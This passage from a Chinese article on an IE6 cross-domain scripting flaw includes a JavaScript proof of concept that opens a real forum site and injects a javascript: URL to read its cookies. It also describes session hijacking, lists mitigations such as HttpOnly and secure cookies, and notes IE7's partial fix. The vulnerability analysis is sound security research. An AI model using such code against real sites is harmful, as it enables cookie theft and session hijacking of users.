揭密鬼页 浅析浏览器跨域安全问题（3）

5.灾难性的后果

到这里我们发现了一个IE6的0DAY，一定程度上这个跨域安全问题是灾难性的，如下面的

EXP：

<a href="">IE6 Cross Domain Scripting</a> 
    <script> 
    function win(){ 
        x=window.open('http://www.phpwind.net'); 
        setTimeout(function(){ 
            x.location=new String("javascript:alert(document.cookie)") 
        },3000) 
    } 
    window.onload=function(){ 
        for (i=0;i<document.links.length;i++) {  
            document.links[i].href="javascript:win()" 
        } 
    } 
    </script>

点击链接后，马上得到了PHPWIND论坛的COOKIE，这就意味着黑客通过类似的攻击可以得到你访问过的任意网站的COOKIE，然后劫持你的会话。

这样的漏洞相当于一个没有域限制的XSS漏洞，几乎是无法防御的，网站只能进一步的加强客户端的会话安全，如使用SSL加密连接、设置安全COOKIE加上HTTPONLY参数、给敏感的请求操作加上水印等。

6.总结

这个跨域安全问题的本质是浏览器在处理window对象的操作有所疏漏，没有考虑清楚不同域有继承关系的window对象操作后的变化，只是对window对象的一些方法的参数做了类似数据类型的限制，导致最后绕过限制跨域执行了脚本。

从这个漏洞我们也可以看出IE7的一些新的安全特性，通过继承关系的window对象操作来跨域执行脚本伪协议最后是判断了域的，IE7已经开始防范类似的攻击。

但是这里并没有在本质上解决跨域安全问题，IE7只防范了跨域执行脚本，对于其他跨域的操作仍然是放行的，所以鬼页在IE7下可以跨域操作框架URL，而Firefox却没有存在相同的问题，说明不同浏览器在安全的考虑上也是存在很多差异的。

针对IE我又测试了其他对象方法，发现很多都被限制住了，但不排除还有同样的问题存在。按照类似的思路，大家可以继续尝试挖掘浏览器的一些跨域漏洞。